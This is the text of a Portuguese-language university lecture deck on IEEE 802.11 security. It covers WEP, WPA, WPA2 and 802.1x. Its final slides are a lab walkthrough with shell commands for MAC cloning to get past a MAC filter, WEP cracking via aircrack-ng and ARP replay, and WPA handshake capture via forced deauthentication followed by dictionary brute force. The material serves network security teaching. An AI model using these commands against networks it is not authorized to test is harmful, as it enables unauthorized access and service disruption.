SlideShare uma empresa Scribd logo
1 de 86
Tecnologia em Redes de
              Computadores


Gerência de Redes


Prática de Ataques - wireless


Professor: André Peres
andre.peres@poa.ifrs.edu.br

Instituto Federal do Rio Grande do Sul - IFRS
Porto Alegre
Enlace IEEE 802.11
Existem 3 tipos de enlace
IBSS (Independent Basic Service Set) = ad-hoc

BSS (Basic Service Set)

ESS (Extended Service Set)
Enlace IEEE 802.11
IBSS ou ad-hoc
Criada de maneira espontânea
Área de abrangência pequena
Sem controle centralizado
Enlace IEEE 802.11
BSS
Controle centralizado (AP – Access Point)
    • Concentrador (hub) para rede sem fios
    • Comutador (switch) entre enlaces com/sem fio
    • Área de abrangência definida pelo AP
Enlace IEEE 802.11
ESS
Múltiplos BSSs
APs se comunicam via DS (distributed system)
Objetivo: roaming
Enlace IEEE 802.11
Ligação entre redes:
Pode utilizar BSS ou IBSS
Com BSS
    • Um AP
    • Dois APs (um é configurado como cliente)
Enlace IEEE 802.11
Nível de enlace IEEE 802.11
    Controle de comunicação de nível físico
    Baseado no padrão IEEE 802.3 (ethernet)
    Utiliza endereços MAC compatíveis com ethernet
    Controle de acesso ao meio: CSMA/CA
    Controle de erros tipo stop-and-wait
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Deve respeitar uma máquina de estados:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de rede (BSSType)
       – Ad-hoc
       – Infra estrutura (BSS)
       – Qualquer

    • Nome da rede (SSID)
       – Uma rede específica
       – Qualquer rede
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de descoberta da rede (scan type)
       – Passivo → aguarda beacon frames
       – Ativo → utiliza probe request

    • Canal a ser utilizado (channel)
       – Especifica um canal 1 → 11
       – Qualquer canal (faz varredura de todos em busca da rede)
Enlace IEEE 802.11
Para conexão de uma estação com a rede
A estação deve “encontrar” a rede
    • O AP divulga sua existência através de beacon frames
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • Por segurança o AP pode não divulgar o nome da rede,
     obrigando a estação a utilizar probe request
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • O AP responde ao Probe Request com um Probe
     Response:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a identificação do SSID e troca de mensagens
iniciais
    • Estado 1 → Não autenticado, Não associado
Passa-se para a fase de autenticação
    • Padrão inicial:
       – Open System
       – Shared Key (WEP)
    • Adicionados Posteriormente:
       – PSK - Pre-Shared Key (WPA, WPA2)
       – 802.1x (WEP, WPA, WPA2)
Enlace IEEE 802.11
Autenticação Open System
Autenticação nula
Qualquer estação é autenticada por padrão
Protocolo:
     1 → Estação envia uma requisição de autenticação
     2 → AP aceita a autenticação (sempre successfull)
Enlace IEEE 802.11
Autenticação Shared Key
Utiliza WEP com texto desafio
    • O WEP utiliza criptografia simétrica (chave única)
Enlace IEEE 802.11
Autenticação Pre-Shared Key
Similar ao Shared Key
A chave é utilizada apenas na autenticação
Autenticação 802.1x
Necessita de um servidor RADIUS
O AP serve como um NAS (Network Access Server)
A comunicação ocorre entre cliente e servidor RADIUS
O servidor RADIUS informa ao AP o resultado da
autenticação
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a autenticação
    • Estado 2 → Autenticado, Não associado

Fase de associação
    • Passagem automática do estado 2 → 3
    • Estado 3 → Autenticado, Associado
    • Agora a estação pode receber/transmitir quadros de
       enlace na rede
    • Acesso ao servidor DHCP, etc...
Segurança IEEE 802.11
 A autenticação faz parte do processo de
segurança
Após a autenticação, a estação passa para o
estado de autenticado/associado
Somente neste estado, a estação pode trocar
quadros de enlace com a rede
Segurança IEEE 802.11
Criptografia
WEP (Wired Equivalent Privacy)
    • Baseia-se na dificuldade do atacante em obter um
       segredo compartilhado entre as estações
    • Utiliza criptografia simétrica
       – Mesma chave para cifragem e decifragem de quadros
    • Baseado no algoritmo RC4
       – Não é uma implementação pura do RC4
       – Foram feitas modificações...
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Criptografia simétrica utilizando operações XOR
Necessita de uma chave com o mesmo tamanho da
mensagem (inviável)
Para contornar este problema utiliza o gerador de
números pseudo-aleatórios (PRNG) do RC4
Funcionamento: utiliza uma SEMENTE secreta para
gerar a chave de cifragem do mesmo tamanho da
mensagem
Segurança IEEE 802.11
WEP
A chave não pode ser reaproveitada em dois quadros

MSG [XOR] CIF → CHAVE

Se atacante insere ou conhece a mensagem original
e captura mensagem cifrada, obtém a chave utilizada
Segurança IEEE 802.11
WEP
Utilização de chave única → problema de sincronismo
!
Segurança IEEE 802.11
WEP
Necessária chave única, para cada quadro de enlace
Quadros de até 3000 bytes a 54 Mbps = muitas
chaves diferentes por segundo
Uma semente gera uma chave...
A mesma semente deve ser utilizada por todas as
estações
Segurança IEEE 802.11
WEP
Solução → utilização de um vetor de inicialização em
conjunto com a semente

IV (Initialization Vector) → 24 bits randômicos
    • Deve ser divulgado para a estação que irá decifrar o
       quadro
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
O segredo permanece o mesmo, enquanto o IV é
alterado a cada quadro de enlace

IV → 24 bits

Segredo → 5 bytes → 40 bits = WEP64

Segredo → 13 bytes → 104 bits = WEP128
Segurança IEEE 802.11
Problemas do WEP
Utilização de chaves repetidas
IV → 24 bits → 224 combinações
Quadros de 1500 bytes a 11 Mbps
(1500 x 8 x 224) / (11 x 106)= 1800 segundos
Aproximadamente 5 horas
Excluindo possibilidade de 2 máquinas utilizarem o
mesmo IV.... .... ...
Segurança IEEE 802.11
Problemas do WEP
Os bits permanecem na mesma posição do quadro...
    • Se atacante deseja alterar um bit, basta inverter o seu
       valor
    • Além disso, deve identificar a alteração no CRC32
Se atacante captura uma chave, já pode gerar
pacotes falsos na rede utilizando esta chave/IV
Segurança IEEE 802.11
Problemas do WEP
Pesquisa de Fluhrer, Mantin, Shamir
     “Weaknesses in the key scheduling Algorithm of RC4”
Possíveis chaves fracas no PRNG do RC4
Ao utilizar uma chave fraca, identifica bits da semente
O WEP utiliza muitas sementes diferentes, gerando
muitas chaves fracas
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




    Total de pacotes: 2,5 milhões

                      Pacotes “interessantes”: 1878

                                         Segredo: xC513
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




  Total de pacotes: 7,3 milhões

                 Pacotes “interessantes”: 4160

                                  Segredo: xCd513ewq1pkm
Segurança IEEE 802.11
Problemas do WEP
Análise dos bits iniciais de uma mensagem cifrada
    • O LLC inclui sempre os mesmos bits: 0xaa

Inferir através de análise probabilística os bits da
semente (os primeiros bits são o IV)

Isto facilita a descoberta dos demais bits da semente
(segredo compartilhado)
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Após descoberta das vulnerabilidades WEP
Criado grupo de trabalho IEEE 802.11i
    • Responsável pelo novo protocolo de segurança 802.11
    • Reuniões entre fabricantes e comunidade científica
Fornecedores preocupados
    •   Demora com 802.11i
    •   Criada Wi-Fi Alliance
    •   Necessidade de compatibilidade com hardware antigo
    •   Apenas atualização de firmware
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Para manter o hardware → novo esquema rodando
sobre protocolo antigo (WEP)
Protocolo WPA (ano: 2002)
   • Mantém o WEP
   • Contém mecanismo de troca de segredo (parte da
      semente além do IV) periodicamente → TKIP
      (Temporal Key Integrity Protocol)
   • Permite autenticação via PSK ou 802.1x
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
MICHAEL
   • Substitui o CRC32 para verificação de integridade de
      mensagens
   • Gera um cálculo de 64 bits
   • Serve para impedir que um atacante consiga inserir
      quadros em uma rede cifrada
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
TKIP
       • Troca dinâmica de segredo
       • Necessita de um novo mecanismo de autenticação
       • Como o segredo é trocado, não pode utilizar a chave dinâmica
           como autenticação (o cliente não conhece a chave)
PSK (Pre-Shared Key)
       • Chave “mestra” utilizada no processo de autenticação
       • Utilizada inicialmente para ingresso na rede
       • Após autenticação, estação recebe a chave que está sendo
          utilizada pelas demais estações na rede
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
PSK (Pre-Shared Key)
   • É o ponto pelo qual um atacante tenta obter acesso à
      rede
   • Atacante captura processo de autenticação e tenta
      identificar a PSK utilizada neste processo
   • Ao obter a PSK, consegue entrar na rede
   • Como o número de quadros trocados na autenticação é
      pequeno, o ataque deve ser baseado em força bruta
   • Força bruta → dicionário de senhas + software de
      análise da autenticação WPA
Segurança IEEE 802.11
WPA + 802.1x
  • Alternativa ao PSK
  • Não possui chave inicial
  • Usuário deve se autenticar com servidor RADIUS
     – PEAP (usuário/senha)
     – Certificado
     – …
  • Necessário servidor RADIUS
  • AP serve como ponte entre estação e RADIUS
Segurança IEEE 802.11
802.1x
  • Baseado no conceito de “portas”
     – Enquanto a estação não finaliza o processo de autenticação fica com a
         “porta” para a rede fechada
     – A única comunicação permitida é com o servidor RADIUS
     – Apenas no final da autenticação com sucesso (indicada pelo servidor
         RADIUS para o AP) o AP libera o acesso
  • Processo de autenticação ocorre no nível de enlace
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
  • No caso de uso de certificados, apenas quem possui
     certificado válido (CA) pode acessar a rede
  • No caso de EAP, verificado usuário/senha
     – Possibilidade de força bruta
  • O AP é autenticado junto ao RADIUS, impedindo AP
     falso
  • Possibilidade de ataques com AP+RADIUS falsos
     – Atacante realiza a autenticação do cliente
     – Não funciona com TLS (autenticação mútua AP ↔ Estação) via
         certificados
Segurança IEEE 802.11
WPA2 (IEEE 802.11i)
Ano: 2004
Substituição total do protocolo criptográfico
Utilização do AES(Advanced Encryption Standard)
    • Robusto
    • Sem ataques à criptografia conhecidos
    • Padrão de criptografia adotado por diversos
       softwares/equipamentos
Incompatível com equipamentos anteriores
Autenticação via PSK e 802.1x, Criptografia AES
Segurança IEEE 802.11
Na prática
WEP → fora !
Usuário doméstico/SOHO:
    • Equipamentos antigos ( → 2004): WPA/PSK
    • Equipamentos novos (2004 → ): WPA2/PSK
Usuário empresarial:
    • Equipamentos antigos ( → 2004) : WPA/802.1x
    • Equipamentos novos (2004 → ) : WPA2/802.1x
Ataques
Visão do atacante:
1. criptografia
nenhuma
WEP
WPA
WPA-2
Ataques
Visão do atacante:
2. autenticação
nenhuma
shared-key
PSK
802.1x
Ataques
Visão do atacante:
3. mecanismos adicionais
nenhum
Filtro MAC
SSID escondido
Mecanismos layer 3 (firewall, etc...)
Ataques
Cenários de testes:
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
2 – WEP
Ataque: quebra do WEP via software
3 – WPA
Ataque: desconexão de um cliente + captura
de autenticação + força bruta
Ataques
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
Passos:
Descoberta do SSID:

- colocar a placa de redes sem fios em modo
monitor
- capturar tráfego via wireshark, tcpdump,
etc....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up



Executar o wireshark e aguardar os “probes”
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Buscar por pacotes de probe (OK)
Buscar pelo MAC address de uma estação que
está navegando
Identificar faixa de endereços IP utilizados e
buscar por um IP que não está sendo usado
Objetivo:
Mesmo MAC, IP diferente....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:

- placa em modo monitor
- wireshark...
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo


     ...         ...
                                        AP

  10.1.1.1    10.1.1.2                  IP

   AA:AA      AA:AA            MAC           MAC

   Físico      Físico          Físico        Físico
Ataques
1 – AP com SSID escondido e filtro de MAC
                        Alvo envia um quadro
Clonagem de MAC:       AP verifica MAC origem
  Atacante       Alvo                          OK !

     ...           ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA        AA:AA                              MAC           MAC

   Físico       Físico                             Físico        Físico


               MAC D | MAC O |   IP O   |   IP D
                                                            OK !

                11:11 AA:AA 10.1.1.2 200.1.1.1
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo                       Volta a resposta

     ...         ...
                                                          AP

  10.1.1.1    10.1.1.2                                    IP

   AA:AA      AA:AA                              MAC           MAC

   Físico      Físico                            Físico        Físico


             MAC D | MAC O |   IP O   |   IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:           As duas placas de
  Atacante      Alvo                           rede aceitam...
                                           e repassam para o IP

     ...          ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA       AA:AA                               MAC           MAC

   Físico       Físico                             Físico        Físico


              MAC D | MAC O |   IP O   |    IP D
               AA:AA 11:11 200.1.1.1 10.1.12
Ataques
                                          IP destino = 10.1.1.1?
1 – AP com SSID escondido e filtro de MAC         NÃO !
                                           Eu sou um roteador?
Clonagem de MAC:                                  NÃO !
  Atacante     Alvo                       → descarta o pacote !!!

     ...         ...
                                                            AP

  10.1.1.1    10.1.1.2                                      IP

   AA:AA      AA:AA                                MAC           MAC

   Físico      Físico                              Físico        Físico


             MAC D | MAC O |   IP O   |     IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Ou seja...
Duas máquinas com mesmo MAC e IP's
diferentes podem “navegar” simultaneamente
(layer3)

… afinal é possível ter uma máquina com mais
de um IP vinculado na mesma placa de rede....
Ataques
 1 – AP com SSID escondido e filtro de MAC
 Clonagem de MAC e associação com AP:
 # killall nm-applet
 # ip l s wlan0 down
 # ip l s wlan0 address 00:1b:77:b9:51:49
 # ip a a 10.1.0.200/24 dev wlan0
 # ip l s wlan0 up
 # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8

# tail -f /var/log/syslog
---------------------------------
kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e
kernel: [ 225.757365] wlan0: beacon received
kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1)
kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401
status=0 aid=1)
kernel: [ 225.785943] wlan0: associated
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
- não utilizar o serviço de DHCP...
- configurar na mão:
→ roteador default
→ servidor de DNS
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
Ataques
2 – Quebra de WEP via software
Vulnerabilidade – PRNG do RC4 gerando
chaves fracas...
Técnica:
1. captura de pacotes cifrados com diferentes
IVs
2. análise dos pacotes (software) para
obtenção do segredo compartilhado
Ataques
2 – Quebra de WEP via software
Passos:
1. colocar a placa de rede em modo monitor
para captura do tráfego cifrado:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up
Ataques
2 – Quebra de WEP via software
Passos:
2. instalação do software aircrack-ng
# apt-get install aircrack-ng


3. captura do tráfego (descoberta das redes)

# airodump-ng wlan0
Ataques
  2 – Quebra de WEP via software
  Passos:
  4. em outro terminal – captura do tráfego
  cifrado de uma rede específica para posterior
  análise
# airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1
wlan0

  5. para diminuir tempo, geração de tráfego
  (requisição de autenticação com o AP)
# aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0
Ataques
 2 – Quebra de WEP via software
 Passos:
 6. captura da requisição de autenticação (os
 pacotes ARP) e repetição dos mesmos para
 geração de mais tráfego
# aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0

 7. Após obter um número significativo de
 pacotes, tentar a análise...
 # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
Ataques
2 – Quebra de WEP via software

Obs: necessário grande volume de tráfego
para análise...
porém, com tráfego suficiente, sempre se
consegue o segredo compartilhado
Ataques
3 – Quebra de WPA via software
Vulnerabilidade:
Mesmo protocolo de autenticação do WEP
quando utilizado PSK

Técnica:
Obtenção dos quadros de associação e
posterior força bruta na PSK
Ataques
  3 – Quebra de WPA via software
  Passos:
  1. colocar a placa de rede em modo monitor
  2. monitorar com airodump-ng
  3. captura de pacotes cifrados (especificar
  WPA)
# airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
Ataques
 3 – Quebra de WPA via software
 Passos:
 4. força a desautenticação de um cliente para
 captura dos quadros de autenticação (falsifica
 mensagem de desaut. do AP)
# aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0

 5. utiliza força bruta (dicionário) para tentar
 obter PSK
 # aircrack-ng -w dicionario.txt wpa1-01.cap

Mais conteúdo relacionado

Mais procurados

Rpc (Distributed computing)
Rpc (Distributed computing)Rpc (Distributed computing)
Rpc (Distributed computing)
Sri Prasanna
 
Dynamic Routing IGRP
Dynamic Routing IGRPDynamic Routing IGRP
Dynamic Routing IGRP
Kishore Kumar
 
Forouzan-ch19-Network-Layer-Logical-Addressing.ppt
Forouzan-ch19-Network-Layer-Logical-Addressing.pptForouzan-ch19-Network-Layer-Logical-Addressing.ppt
Forouzan-ch19-Network-Layer-Logical-Addressing.ppt
Jayaprasanna4
 

Mais procurados (20)

Cryptography in Python
Cryptography in PythonCryptography in Python
Cryptography in Python
 
Stop And Wait
Stop And WaitStop And Wait
Stop And Wait
 
PLNOG16: IP/MPLS for Fixed and Mobile Convergence, Kevin Wang
PLNOG16: IP/MPLS for Fixed and Mobile Convergence, Kevin WangPLNOG16: IP/MPLS for Fixed and Mobile Convergence, Kevin Wang
PLNOG16: IP/MPLS for Fixed and Mobile Convergence, Kevin Wang
 
OSI-Schichtenmodell
OSI-SchichtenmodellOSI-Schichtenmodell
OSI-Schichtenmodell
 
Cisco CCNA- DHCP Server
Cisco CCNA-  DHCP ServerCisco CCNA-  DHCP Server
Cisco CCNA- DHCP Server
 
IPV6 Addressing
IPV6 Addressing IPV6 Addressing
IPV6 Addressing
 
Netmanias L2,L3 Training (3) L2, L3 QoS
Netmanias L2,L3 Training (3) L2, L3 QoSNetmanias L2,L3 Training (3) L2, L3 QoS
Netmanias L2,L3 Training (3) L2, L3 QoS
 
Ssl in a nutshell
Ssl in a nutshellSsl in a nutshell
Ssl in a nutshell
 
SSL/TLS
SSL/TLSSSL/TLS
SSL/TLS
 
Konfigurasi VLAN di SwitchOS MikroTik
Konfigurasi VLAN di SwitchOS MikroTikKonfigurasi VLAN di SwitchOS MikroTik
Konfigurasi VLAN di SwitchOS MikroTik
 
Rpc (Distributed computing)
Rpc (Distributed computing)Rpc (Distributed computing)
Rpc (Distributed computing)
 
Protocólo FTP
Protocólo FTPProtocólo FTP
Protocólo FTP
 
Introducing Galera 3.0
Introducing Galera 3.0Introducing Galera 3.0
Introducing Galera 3.0
 
SSL
SSLSSL
SSL
 
Dynamic Routing IGRP
Dynamic Routing IGRPDynamic Routing IGRP
Dynamic Routing IGRP
 
Radware Alteon Introduction - new GUI
Radware Alteon Introduction - new GUIRadware Alteon Introduction - new GUI
Radware Alteon Introduction - new GUI
 
ospf routing protocol
ospf routing protocolospf routing protocol
ospf routing protocol
 
TCP/IP Basics
TCP/IP BasicsTCP/IP Basics
TCP/IP Basics
 
IPSec Overview
IPSec OverviewIPSec Overview
IPSec Overview
 
Forouzan-ch19-Network-Layer-Logical-Addressing.ppt
Forouzan-ch19-Network-Layer-Logical-Addressing.pptForouzan-ch19-Network-Layer-Logical-Addressing.ppt
Forouzan-ch19-Network-Layer-Logical-Addressing.ppt
 

Semelhante a Ataque Redes Wireless - Prática de Ataques

Aula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança IIAula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança II
Andre Peres
 
Seguranca Wireless Instituto Online
Seguranca Wireless   Instituto OnlineSeguranca Wireless   Instituto Online
Seguranca Wireless Instituto Online
instonline
 
Aula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - EnlaceAula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - Enlace
Andre Peres
 
225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca
Marco Guimarães
 

Semelhante a Ataque Redes Wireless - Prática de Ataques (20)

Aula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança IIAula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança II
 
06 - Redes sem Fios - seguranca
06 - Redes sem Fios -  seguranca06 - Redes sem Fios -  seguranca
06 - Redes sem Fios - seguranca
 
Vulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiVulnerabilidades em Redes Wifi
Vulnerabilidades em Redes Wifi
 
Seguranca Wireless Instituto Online
Seguranca Wireless   Instituto OnlineSeguranca Wireless   Instituto Online
Seguranca Wireless Instituto Online
 
Wardriving
WardrivingWardriving
Wardriving
 
Aula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - EnlaceAula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - Enlace
 
802.11i
802.11i802.11i
802.11i
 
Segurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoaisSegurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoais
 
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
 
WiFi Security and QOS
WiFi Security and QOSWiFi Security and QOS
WiFi Security and QOS
 
Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes
 
Segurança em redes sem fio
Segurança em redes sem fioSegurança em redes sem fio
Segurança em redes sem fio
 
225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca
 
3 - Redes de Comutadores - ethernet wifi
3 - Redes de Comutadores -  ethernet wifi3 - Redes de Comutadores -  ethernet wifi
3 - Redes de Comutadores - ethernet wifi
 
Camada de enlace parte2
Camada de enlace   parte2Camada de enlace   parte2
Camada de enlace parte2
 
44 sockets[1]
44 sockets[1]44 sockets[1]
44 sockets[1]
 
Segurança de rede wi fi - WPA
Segurança de rede wi fi - WPASegurança de rede wi fi - WPA
Segurança de rede wi fi - WPA
 
Protocolos
ProtocolosProtocolos
Protocolos
 
Segurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av iiSegurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av ii
 
Segurança nas redes wirelless
Segurança nas redes wirellessSegurança nas redes wirelless
Segurança nas redes wirelless
 

Mais de Andre Peres

Mais de Andre Peres (20)

04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisico04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisico
 
05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlace05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlace
 
03- Redes sem Fios - antenas
03- Redes sem Fios -  antenas03- Redes sem Fios -  antenas
03- Redes sem Fios - antenas
 
01 - Redes sem Fios - introducao
01 - Redes sem Fios -  introducao01 - Redes sem Fios -  introducao
01 - Redes sem Fios - introducao
 
02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondas02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondas
 
10 - segurança -snmp
10  - segurança -snmp10  - segurança -snmp
10 - segurança -snmp
 
8 - segurança - anatomia ataques
8 - segurança - anatomia ataques8 - segurança - anatomia ataques
8 - segurança - anatomia ataques
 
9 - segurança - ataques buffer-injection
9 - segurança -  ataques buffer-injection9 - segurança -  ataques buffer-injection
9 - segurança - ataques buffer-injection
 
7 - segurança - dmz vpn
7  - segurança -  dmz vpn7  - segurança -  dmz vpn
7 - segurança - dmz vpn
 
6 - segurança - criptografia
6   - segurança - criptografia6   - segurança - criptografia
6 - segurança - criptografia
 
5 - segurança - firewall
5  - segurança - firewall5  - segurança - firewall
5 - segurança - firewall
 
4 - segurança - mecanismos
4 - segurança - mecanismos4 - segurança - mecanismos
4 - segurança - mecanismos
 
3 - segurança - psi
3 - segurança - psi3 - segurança - psi
3 - segurança - psi
 
2 - segurança - analise de-riscos
2 - segurança - analise de-riscos2 - segurança - analise de-riscos
2 - segurança - analise de-riscos
 
1 - Segurança - introducao
1 - Segurança - introducao1 - Segurança - introducao
1 - Segurança - introducao
 
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
 
6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissao6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissao
 
5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls 5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls
 
4 - Redes de Computadores - arp-vlan-equips
4 - Redes de Computadores - arp-vlan-equips4 - Redes de Computadores - arp-vlan-equips
4 - Redes de Computadores - arp-vlan-equips
 
2 - Redes de Comutadores - acesso meio
2 - Redes de Comutadores -  acesso meio2 - Redes de Comutadores -  acesso meio
2 - Redes de Comutadores - acesso meio
 

Último

ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
azulassessoria9
 
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
PatriciaCaetano18
 
Expansão Marítima- Descobrimentos Portugueses século XV
Expansão Marítima- Descobrimentos Portugueses século XVExpansão Marítima- Descobrimentos Portugueses século XV
Expansão Marítima- Descobrimentos Portugueses século XV
lenapinto
 

Último (20)

P P P 2024 - *CIEJA Santana / Tucuruvi*
P P P 2024  - *CIEJA Santana / Tucuruvi*P P P 2024  - *CIEJA Santana / Tucuruvi*
P P P 2024 - *CIEJA Santana / Tucuruvi*
 
Novena de Pentecostes com textos de São João Eudes
Novena de Pentecostes com textos de São João EudesNovena de Pentecostes com textos de São João Eudes
Novena de Pentecostes com textos de São João Eudes
 
Sopa de letras | Dia da Europa 2024 (nível 1)
Sopa de letras | Dia da Europa 2024 (nível 1)Sopa de letras | Dia da Europa 2024 (nível 1)
Sopa de letras | Dia da Europa 2024 (nível 1)
 
Camadas da terra -Litosfera conteúdo 6º ano
Camadas da terra -Litosfera  conteúdo 6º anoCamadas da terra -Litosfera  conteúdo 6º ano
Camadas da terra -Litosfera conteúdo 6º ano
 
Falando de Física Quântica apresentação introd
Falando de Física Quântica apresentação introdFalando de Física Quântica apresentação introd
Falando de Física Quântica apresentação introd
 
3 2 - termos-integrantes-da-oracao-.pptx
3 2 - termos-integrantes-da-oracao-.pptx3 2 - termos-integrantes-da-oracao-.pptx
3 2 - termos-integrantes-da-oracao-.pptx
 
ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
ATIVIDADE 2 - DESENVOLVIMENTO E APRENDIZAGEM MOTORA - 52_2024
 
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
